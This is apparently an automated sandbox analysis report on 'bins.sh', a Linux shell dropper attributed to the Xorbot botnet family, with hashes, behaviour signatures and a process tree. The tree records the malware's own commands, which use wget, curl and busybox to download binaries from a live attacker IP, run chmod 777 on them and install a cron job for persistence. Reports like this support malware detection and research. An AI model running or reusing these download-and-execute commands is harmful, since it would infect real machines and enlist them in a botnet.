Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
148s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/02/2025, 06:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
74e19a07a6f06527a755064e902a5b45
-
SHA1
fdbb2989f0ce113278b0df08ad6b9fdb2f9240b1
-
SHA256
0c1a0ababd6c481377018db4947b0ee4d22d820106e7e8932825ef3dc27d704d
-
SHA512
d25e290d64a454f44d950f75a931a00c482517dae81453675ce54d6ec589ccdaca831d2d459b9992859d94bdcbd95c9fe3d888c002311c17ca851ea2659877a3
-
SSDEEP
192:UttSrhgGIWhWFWYW/W3WBViarAMMICuxTzyhfH2R9Jb7Exdvb7ExdHtTz0fH2R9/:UttSrhgGIWhWFWYW/W3WB6ICukhfH2R9
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (818) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1524 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb 1525 bins.sh -
Renames itself 1 IoCs
pid Process 1526 bins.sh -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.0a5FxA crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/13/cmdline bins.sh File opened for reading /proc/25/cmdline bins.sh File opened for reading /proc/80/cmdline bins.sh File opened for reading /proc/169/cmdline bins.sh File opened for reading /proc/1192/cmdline bins.sh File opened for reading /proc/15/cmdline bins.sh File opened for reading /proc/1554/cmdline bins.sh File opened for reading /proc/1578/cmdline bins.sh File opened for reading /proc/1619/cmdline bins.sh File opened for reading /proc/279/cmdline bins.sh File opened for reading /proc/1567/cmdline bins.sh File opened for reading /proc/1581/cmdline bins.sh File opened for reading /proc/1607/cmdline bins.sh File opened for reading /proc/1623/cmdline bins.sh File opened for reading /proc/18/cmdline bins.sh File opened for reading /proc/446/cmdline bins.sh File opened for reading /proc/516/cmdline bins.sh File opened for reading /proc/559/cmdline bins.sh File opened for reading /proc/31/cmdline bins.sh File opened for reading /proc/1113/cmdline bins.sh File opened for reading /proc/1531/cmdline bins.sh File opened for reading /proc/1563/cmdline bins.sh File opened for reading /proc/1615/cmdline bins.sh File opened for reading /proc/177/cmdline bins.sh File opened for reading /proc/532/cmdline bins.sh File opened for reading /proc/1239/cmdline bins.sh File opened for reading /proc/176/cmdline bins.sh File opened for reading /proc/961/cmdline bins.sh File opened for reading /proc/1153/cmdline bins.sh File opened for reading /proc/1539/cmdline bins.sh File opened for reading /proc/1565/cmdline bins.sh File opened for reading /proc/1575/cmdline bins.sh File opened for reading /proc/185/cmdline bins.sh File opened for reading /proc/683/cmdline bins.sh File opened for reading /proc/1542/cmdline bins.sh File opened for reading /proc/1559/cmdline bins.sh File opened for reading /proc/1090/cmdline bins.sh File opened for reading /proc/1536/cmdline bins.sh File opened for reading /proc/9/cmdline bins.sh File opened for reading /proc/98/cmdline bins.sh File opened for reading /proc/1548/cmdline bins.sh File opened for reading /proc/1635/cmdline bins.sh File opened for reading /proc/16/cmdline bins.sh File opened for reading /proc/674/cmdline bins.sh File opened for reading /proc/1203/cmdline bins.sh File opened for reading /proc/1564/cmdline bins.sh File opened for reading /proc/1600/cmdline bins.sh File opened for reading /proc/1626/cmdline bins.sh File opened for reading /proc/82/cmdline bins.sh File opened for reading /proc/1080/cmdline bins.sh File opened for reading /proc/1549/cmdline bins.sh File opened for reading /proc/4/cmdline bins.sh File opened for reading /proc/30/cmdline bins.sh File opened for reading /proc/89/cmdline bins.sh File opened for reading /proc/179/cmdline bins.sh File opened for reading /proc/665/cmdline bins.sh File opened for reading /proc/1173/cmdline bins.sh File opened for reading /proc/32/cmdline bins.sh File opened for reading /proc/1550/cmdline bins.sh File opened for reading /proc/1582/cmdline bins.sh File opened for reading /proc/1610/cmdline bins.sh File opened for reading /proc/1620/cmdline bins.sh File opened for reading /proc/1066/cmdline bins.sh File opened for reading /proc/1566/cmdline bins.sh -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb wget File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb curl File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1516 -
/bin/rm/bin/rm bins.sh2⤵PID:1517
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/chmodchmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/usr/bin/crontabcrontab -l2⤵PID:1528
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1530
-
-
/bin/rmrm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵PID:1532
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵PID:1535
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
210B
MD5319f67d1e9aedd05915dbb7428310c7a
SHA15955ba71ccb0ee4f7e957a029a088c4bb2ad4c7a
SHA25688657960965de85c0ccb9fb7c5cff8bac05bb9667959f8ff12ef0429285f8d0c
SHA512c469c53d6713d7c5ad9c7d05fdf3873473270fe115c7918f7acd37a9726eb8a1c83d572c0cd17139f3d09b205c956e95079cf5e0c570e70289db315900496e97